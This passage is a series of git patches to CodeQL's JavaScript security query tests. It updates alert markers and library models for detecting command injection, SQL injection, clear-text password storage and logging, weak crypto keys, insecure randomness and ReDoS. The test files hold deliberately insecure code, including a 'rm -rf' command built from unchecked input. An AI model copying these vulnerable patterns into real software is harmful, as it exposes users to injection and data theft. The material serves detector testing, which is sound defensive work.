d84fc28af7b3..ed1c9041a8ea 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -43,12 +43,12 @@ var server = http.createServer(function(req, res) { args[1] = cmd; cp.execFile("/bin/bash", args); // $ Alert - let args = []; + args = []; args[0] = "-c"; args[1] = cmd; run("sh", args); - let args = []; + args = []; args[0] = `-` + "c"; args[1] = cmd; cp.execFile(`/bin` + "/bash", args); // $ Alert @@ -56,10 +56,10 @@ var server = http.createServer(function(req, res) { cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert - let myArgs = []; + let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments + cp.execFile(`/bin` + "/bash", myArgs); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); From c051b4c98d6b3af9ff084a66cc36f9d859ba2212 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:06 +0100 Subject: [PATCH 068/892] JS: Add spurious alert marker --- .../ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 9ed6877e8663..2d82889d7f49 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] + ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From cf33db78ccdcd8e3d3daf1cb22e75bfbe353c23f Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:34 +0100 Subject: [PATCH 069/892] JS: Fix the spurious flow --- javascript/ql/lib/semmle/javascript/frameworks/SQL.qll | 5 ++++- .../test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll index 218f2f8366e5..9d106251a211 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll @@ -221,7 +221,10 @@ private module Postgres { /** Gets a value that is plugged into a raw placeholder variable, making it a sink for SQL injection. */ private DataFlow::Node getARawValue() { - result = this.getValues() and this.getARawParameterName() = "1" // Special case: if the argument is not an array or object, it's just plugged into $1 + result = this.getValues() and + this.getARawParameterName() = "1" and // Special case: if the argument is not an array or object, it's just plugged into $1 + not result instanceof DataFlow::ArrayCreationNode and + not result instanceof DataFlow::ObjectLiteralNode or exists(DataFlow::SourceNode values | values = this.getValues().getALocalSource() | result = values.getAPropertyWrite(this.getARawParameterName()).getRhs() diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 2d82889d7f49..9ed6877e8663 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements + ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From c593853710dae13f6d7faa8823fc9e2b2bea10fb Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:00:11 +0100 Subject: [PATCH 070/892] JS: Record some missing alerts in FileAccessToHttp --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index a354777e4921..f7e3a43a087e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ Alert - passing data from file to the request json body + 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body }); // An object of options to indicate where to post to @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body post_req.end(); } From 319ee2ccd522682fb1441f8115957ce3b08098a2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:20:44 +0100 Subject: [PATCH 071/892] JS: Track deep flow through qs.stringify --- .../javascript/frameworks/UriLibraries.qll | 19 +++++++++++++++++++ .../Security/CWE-200/googlecompiler.js | 4 ++-- 2 files changed, 21 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll index 0a262d154b2b..90dcc886ed43 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll @@ -421,3 +421,22 @@ private module ClosureLibraryUri { } } } + +private class QueryStringStringification extends DataFlow::SummarizedCallable { + QueryStringStringification() { this = "query-string stringification" } + + override DataFlow::InvokeNode getACall() { + result = + API::moduleImport(["querystring", "query-string", "querystringify", "qs"]) + .getMember("stringify") + .getACall() or + result = API::moduleImport("url-parse").getMember("qs").getMember("stringify").getACall() or + result = API::moduleImport("parseqs").getMember("encode").getACall() + } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + preservesValue = false and + input = ["Argument[0]", "Argument[0].AnyMemberDeep"] and + output = "ReturnValue" + } +} diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index f7e3a43a087e..21f88a6d7eed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body + post_req.write(post_data); // $ Alert - post the data from file to request body post_req.end(); } @@ -58,4 +58,4 @@ fs.readFile('LinkedList.js', 'utf-8', function (err, data) { console.log("No data to post"); process.exit(-1); } -}); \ No newline at end of file +}); From e745f42291772beb1920eacd68a3b050284d6d5b Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:41 +0100 Subject: [PATCH 072/892] JS: Remove alert expectation from step This is just a step on the path, not a sink --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index 21f88a6d7eed..b71ed168533f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body + 'js_code' : codestring // passing data from file to the request json body }); // An object of options to indicate where to post to From d3de6d18a44f673bbe1af779a11955644ff1a1fa Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:47 +0100 Subject: [PATCH 073/892] JS: Accept other changes to UnusedVariable --- .../Declarations/UnusedVariable/UnusedIndexVariable.js | 2 +- .../ql/test/query-tests/Declarations/UnusedVariable/eval.js | 4 ++-- .../query-tests/Declarations/UnusedVariable/multi-imports.js | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index 7d76d97b96bb..321a1df2f7b3 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++ Date: Tue, 11 Feb 2025 16:38:52 +0100 Subject: [PATCH 074/892] JS: Some more test changes in SpuriousArguments --- .../query-tests/LanguageFeatures/SpuriousArguments/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 046ca3aec677..387348232e3d 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -40,7 +40,7 @@ new String(1, 2, 3); // $ Alert h(function(x) { return x; }); })(function() {}); -parseFloat("123", 10); +parseFloat("123", 10); // $ Alert - unlike parseInt this does not take a radix (function testWhitelistEmptyFunctions(){ function nonEmpty(){ @@ -115,7 +115,7 @@ parseFloat("123", 10); throwerArrow(42); throwerCustom(42); throwerWithParam(42, 87); // $ Alert - throwerIndirect(42); // OK - but still flagged due to complexity + throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity }); function sum2() { From 576dbcb02053f0fb74238c56f2988a4a10439992 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:18:24 +0100 Subject: [PATCH 075/892] JS: Stop overriding entire module.exports object in test Doing `module.exports = blah` prevents other exports from being seen as library inputs. --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index b6efdbd131a6..77f49ad77017 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,6 +1,6 @@ var cp = require("child_process") -module.exports = function (name) { +module.exports.blah = function (name) { cp.exec("rm -rf " + name); // $ Alert cp.execFile(name, [name]); @@ -19,7 +19,7 @@ function cla() { } cla.prototype.method = function (name) { cp.exec("rm -rf " + name); // $ Alert } -module.exports = new cla(); +module.exports.cla = new cla(); function cla2() { } @@ -474,7 +474,7 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports = function check(config) { +module.exports.check = function check(config) { const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } From b54ff3b5b3cdf56249e98e9225f1c81f73f60579 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:31:52 +0100 Subject: [PATCH 076/892] JS: Accept an alert --- .../ql/test/query-tests/Security/CWE-312/CleartextStorage2.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js index 88385a96ab49..ba26d5bc18e3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js @@ -4,7 +4,7 @@ var url = require('url'); var server = https.createServer(function(req, res) { let pw = url.parse(req.url, true).query.current_password; res.writeHead(200, { - 'Set-Cookie': 'password=' + pw, + 'Set-Cookie': 'password=' + pw, // $ Alert[js/clear-text-storage-of-sensitive-data] 'Content-Type': 'text/plain' }); }); From e91a046a17a35aa11adbc8760659f53346ffbeae Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:17 +0100 Subject: [PATCH 077/892] JS: Mark a spurious alert --- javascript/ql/test/query-tests/Security/CWE-312/passwords.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index 686f3d3f4282..af3f1a268a48 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -75,7 +75,7 @@ console.log(config); var temp = { encryptedPassword: req.body.password }; - console.log(temp.encryptedPassword); // OK - XXX + console.log(temp.encryptedPassword); // $ SPURIOUS: Alert[js/clear-text-logging] var secret = password; console.log(`pw: ${secret}`); // $ Alert[js/clear-text-logging] From 51b45598c4682a2158e8a56d96dcf74871ec3a85 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:35 +0100 Subject: [PATCH 078/892] JS: Move an alert and add query ID --- .../ql/test/query-tests/Security/CWE-312/passwords.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index af3f1a268a48..73170197965f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -139,19 +139,19 @@ }); function indirectLogCall() { - console.log.apply(this, arguments); + console.log.apply(this, arguments); // $ Alert[js/clear-text-logging] } var Util = require('util'); (function() { var config = { x: password }; - indirectLogCall(config.x); // $ Alert - indirectLogCall(process.env); // $ Alert + indirectLogCall(config.x); + indirectLogCall(process.env); var procdesc = Util.inspect(process.env).replace(/\n/g, '') - indirectLogCall(procdesc); // $ Alert + indirectLogCall(procdesc); console.log(process.env); // $ Alert[js/clear-text-logging] console.log(process.env.PATH); From fc9570234184d86394f66418b31b95f329c27719 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:34:07 +0100 Subject: [PATCH 079/892] JS: Accept some more alerts from CleartextStorage --- .../query-tests/Security/CWE-312/passwords_in_server_1.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_2.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_3.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_4.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-312/tst-webstorage.js | 8 ++++---- 6 files changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js index 50caa0584aa5..b2cabbc9944f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js @@ -3,4 +3,4 @@ var app = express(); app.get('/some/path', function() { }) -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js index a59e8bba77fa..94fd757c33ce 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js @@ -1,3 +1,3 @@ require("foo"); (function (req, res){}); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js index ea6132502372..118ae5dd2a75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js @@ -1,2 +1,2 @@ var server = require("./server"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js index 53279ea2853a..c47deadde58a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js @@ -1,2 +1,2 @@ require("foo"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js index 6070f3d1aebb..d5bb42d5dd07 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js @@ -5,5 +5,5 @@ app.get('/some/path', function() { }) function f(x) { - console.log(x); + console.log(x); // $ Alert[js/clear-text-logging] } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js index d6adb2fbb75b..43c9e0423e36 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js @@ -1,4 +1,4 @@ -localStorage.x = data.password; -localStorage.setItem('x', data.password) -sessionStorage.x = data.password; -sessionStorage.setItem('x', data.password) +localStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +localStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] From 0f8e85fa2fa1a961c8b15f8dcb4c8f43babd4b81 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:36:10 +0100 Subject: [PATCH 080/892] JS: Accept alerts for InsufficientKeySize --- javascript/ql/test/query-tests/Security/CWE-326/tst.js | 2 +- javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.js b/javascript/ql/test/query-tests/Security/CWE-326/tst.js index 3f636a97e966..839d4fcfc816 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.js @@ -32,7 +32,7 @@ var bad9 = forge.cipher.createDecipher('3DES-CBC', key3); // $ Alert var key4 = myBuffer.getBytes(16); var good5 = forge.cipher.createDecipher('AES-CBC', key4); -var bad10 = crypto.createDiffieHellman(512); +var bad10 = crypto.createDiffieHellman(512); // $ Alert var good6 = crypto.createDiffieHellman(2048); const NodeRSA = require('node-rsa'); diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs index d5e5051af668..1db03f450491 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs @@ -1,5 +1,5 @@ const crypto = $.require("crypto"); -const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // NOT OK +const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // $ Alert const good1 = crypto.generateKeyPairSync("rsa", { modulusLength: 4096 }); // OK From 92c39394576da5a363f9256e6020e181566a6284 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 18 Feb 2025 13:19:37 +0100 Subject: [PATCH 081/892] JS: Accept InsecureRandomness alerts --- javascript/ql/test/query-tests/Security/CWE-338/tst.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-338/tst.js b/javascript/ql/test/query-tests/Security/CWE-338/tst.js index d8d0c1adcb74..d22bcc5d6df2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-338/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-338/tst.js @@ -87,12 +87,12 @@ function f17() { } function f18() { - var secret = (o.password = Math.random()); + var secret = (o.password = Math.random()); // $ Alert } (function(){ var crypto = require('crypto'); - crypto.createHmac('sha256', Math.random()); + crypto.createHmac('sha256', Math.random()); // $ Alert })(); (function () { @@ -118,7 +118,7 @@ function uid() { var my_nice_uid = Math.floor(Math.random() * 4_000_000_000); // $ Alert var liquid = Math.random(); var UUID = Math.random(); // $ Alert - var MY_UID = Math.random(); // NOK OK + var MY_UID = Math.random(); // $ Alert } function buildPass(opts, length) { @@ -136,4 +136,4 @@ function buildPass(opts, length) { password += chars[Math.floor(Math.random() * chars.length)]; // $ Alert } return password; -} \ No newline at end of file +} From 283b14207dfb82901dcb198505411d07f0461bf3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:18:56 +0100 Subject: [PATCH 082/892] JS: Accept some ReDoS alerts --- .../Security/CWE-400/ReDoS/highlight.js | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js index f12d49ba07ae..7677dad3f53d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js @@ -1,39 +1,39 @@ // routeros -var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; +var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; // $ Alert[js/redos] var good = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; // powershell -var bad = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; +var bad = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // $ Alert[js/redos] var good = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // perl -var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; +var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; // $ Alert[js/redos] var good = /(s|tr|y)\/(\\.|[^\\\/])*\/(\\.|[^\\\/])*\/[dualxmsipn]{0,12}/m; // gams -var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; +var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; // $ Alert[js/redos] var good = /[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+([ ]+[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)*/im; // handlebars -var bad = /('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; +var bad = /('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; // $ Alert[js/redos] var good = /(\.|\.\/|\/)?(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+)((\.|\/)(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+))*/im; // c-like -var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; +var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // $ Alert[js/redos] var good = 